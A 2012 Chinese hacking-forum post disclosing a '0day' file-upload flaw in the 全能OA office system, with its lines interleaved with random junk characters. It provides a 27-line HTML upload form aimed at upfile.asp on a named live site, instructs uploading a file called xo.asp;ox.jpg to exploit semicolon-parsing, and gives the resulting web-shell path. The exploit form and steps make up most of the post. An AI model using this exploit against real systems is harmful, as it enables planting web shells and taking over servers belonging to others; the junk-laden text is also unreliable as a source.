找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2165|回复: 0
打印 上一主题 下一主题

全能OA办公系统0day OA办公系统漏洞 上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-21 13:45:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
全能OA办公系统 上传漏洞  y' `0 N# Z( r# ~" @
3 B. ^2 ?- |  G9 Z$ b
系统介绍:
$ G/ Q. z2 Q. W; A$ G( e, ?- i3 T0 V' B6 s8 u+ O3 |
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。: a% c1 @& n' N% _9 R" _

4 q" r1 l/ p* r3 }" V% r" Q主要功能:/ b0 ], Q( y9 L$ ?, M, W
公司通告
5 F+ q* G( g3 U! i7 \工作计划
- V! Q3 P7 |" M6 r( y通讯助理
3 m! x+ C. Q( y4 N. x客户资源 - {3 u* Q- n$ |1 A
我的公文 8 z! S0 P, e2 {$ j$ l
公文传阅
& l( L- q7 ?0 C公共资源 & K' z" D5 k( ~/ ^( n( g; [6 w
资源预约 9 [+ a0 E/ P' @3 |2 _, M( u
今日考勤
" }! S$ H4 h, M个人计划 & t4 u5 R9 A7 F' f7 |% X* r
个人通讯录 ) a, j3 [+ \+ y  m( Y
个人基本档案 2 f! s; A/ X! Q( l. l( x, }
未读邮件
7 y$ @: E2 G5 R6 T( r( l5 J发邮件
: N! Q. I( s1 Z收件夹
0 e5 v: U8 j! S- G  i3 i- e; J0 @寄件夹 ' Z5 [" {( ~: x' d. g
网络硬盘 * |& f( W' }& D' C$ \
网络会议 " H& v6 a1 [7 ?. T
网络调查
* c# |: @; k0 x( V% k5 H5 c% D( o1 c" X交流论坛; A( v- e9 L4 h$ Y$ O6 y% h

1 F6 r$ q5 f2 M* i9 }7 {! ~4 x有兴趣测试的朋友可以下源码看看. E; j* n/ o4 b& c: l; m5 n; e
( a* m  z! q" L8 U5 {& l
源码下载:- `: D7 D- B- ^; C8 h. k0 \2 \3 g

" m. w2 `! s. i) e( W# O/ Dhttp://www.mycodes.net/30/4750.htm
4 @- C6 G4 h1 D
3 u4 ]8 I2 A4 Z2 M5 l漏洞介绍:
2 U  @, _+ a7 E# Y6 S& n  p2 b
5 G8 N  l: X0 z; `% w由upfile.asp上传文件漏洞引起
& A# ]0 O' p( q: D, e' Y+ q$ V8 s0 A0 D' \* g# a/ F# w
测试方法:7 U/ D8 W9 a- Z1 E0 @% B: O0 Q% c
  z% ?3 L! o7 Z* A* W
使用名小子上传http://www.itlynn.com/upfile.asp即可. S- n* G+ ^9 |# H

+ \$ `: g4 b! x, \4 z如果upfile.asp文件被删除不存在。( Y5 t1 B! s0 }. q! O

" X. c9 z$ i& ?- F! x- \* [) Z  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp0 b& F1 d) o) L6 X8 ~0 C& a5 A% a  }

& V2 V! X8 E8 s/ A- w9 b如果存在那么将如下代码保存为upfile.html。
0 V: G' `! a5 h; V
; M2 G' y. P6 [1 {, T7 o5 q. |然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp+ }5 T5 k/ n/ i) Q+ T! t$ ?
% m6 T, h* e" S

9 g3 s+ x9 c0 k
; o, P% _7 b' @6 C+ H01 <table border='0' align="center" cellpadding="5">
2 e4 r4 A- Y2 k% x. s8 U; N) _$ e' s, A* ^+ h; J
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> - m  G  l/ d3 }" c% O6 [; ~
7 v# E2 H! w. D' v# z' K& h/ ]
03 <tr>
& S8 S( I/ O" A$ f: c5 ?+ _3 t- }/ s! [3 F
04             <td>报错:</td>
6 l# N, S) v4 k4 z! v& d5 \2 y  t/ b$ H  Q1 D
05             <td><input type='radio' name='errnumber' value='0'> " _7 W! e- O! Y$ n. w

3 S* m$ z' y; t% y& z; `06               自动更名
) g: q+ D1 t) @- C& s( |- N
$ |& Z3 ^& ~1 v) b& B+ e07               <input type='radio' name='errnumber' value='1' checked>
+ C! f0 \* L. m, z7 I( N- u1 O0 m$ \5 W
08               报错方式 1 s, W1 ?$ A3 X  f7 i3 l: C

4 z4 h2 [% f! e9 W# n4 h0 Z" Y09               <input type='radio' name='errnumber' value='2'> 1 N" z2 d7 Q8 A9 D/ R

; B- _5 [4 y! g7 h10               直接覆盖</td> 1 _9 [4 M+ P4 h
2 T! P; f, i, R. d  V+ ?3 h
11           </tr>
  h6 \: w: S: c# m1 a! \" @) T/ ~0 ^& r/ u
12           <tr> ' j8 T/ e0 ~8 I: Z  P0 z% d5 Y
' ^' A3 Q% B' D% ]: H% |: y
13             <td>主题:</td> & e7 W8 @: X  X4 i. `% r# g! o
& t- P- }0 p; T# l; l; |
14             <td><input type='text' name='filename' size='30'></td> 2 r; g( e6 {8 B( A
6 \0 n1 M( f% c4 E- L3 A  n% L
15           </tr> / I5 f- A3 W, s$ y
( f) v2 I. O' e  E  ]
16           <tr>
6 J" \' p" b* \1 Z$ X
# ]9 ~1 y5 Y, o- d: l17             <td>文件:</td>
9 g. F& B; N8 a' i
1 |, {; d7 D4 L! l2 t18             <td><input type="file"name="fruit"size="30"></td>
* i! D6 t$ j- r/ ?7 t
. e2 m! y6 \/ C' j19           </tr> ! \5 z) D. [+ G6 a

* v' V& D% P6 ^6 p0 I1 Z* T0 K7 G20           <tr>
0 u. z  [" ^, A3 w8 f! I" V- b. Z0 Y0 ]
21             <td valign='top'>简介:</td>
0 p3 j+ [, q7 O# R+ V. q; K5 m, D: z" S7 X5 ~2 a; T6 ~, n4 M2 ]
22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
& U3 w7 ^4 u8 Q4 j* x) i0 O  R* D/ ^. x) p0 }4 [' c$ H5 @" [
23           </tr> ( i' ^* i( T- T( E8 K& f+ b3 }- U( T

  u- Z$ F; s+ p- s) w/ `" k" r) y24   
& L9 ~9 s# ]4 ], g, w! @, H8 _+ X0 K" D4 T; ^8 d
25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
: E9 {) x/ W) y. ~/ a& G; m3 i, M* p4 w) l
26           </tr> , N) j9 f* O  [9 S, u0 o% S! b+ m

; \; e" T3 G. M5 r27         </form>
3 X  H4 U/ E) @" P& q% E' j5 c; h6 ]7 y' h# T1 U  E7 r& G
然后打开上传一个文件名为xo.asp;ox.jpg的文件。
. d: [  \5 T0 E) _
3 y  p& S5 F& p1 I3 @ # M) R. h4 A3 P: h

/ t7 H, i  _- e6 w% ^上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg/ u5 [0 }! k! J* J
) u  H# Q0 K% s" j' S& N
此漏洞需要配合解析漏洞利用。3 T# A+ h) `7 J

: M, S- w# \7 m
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表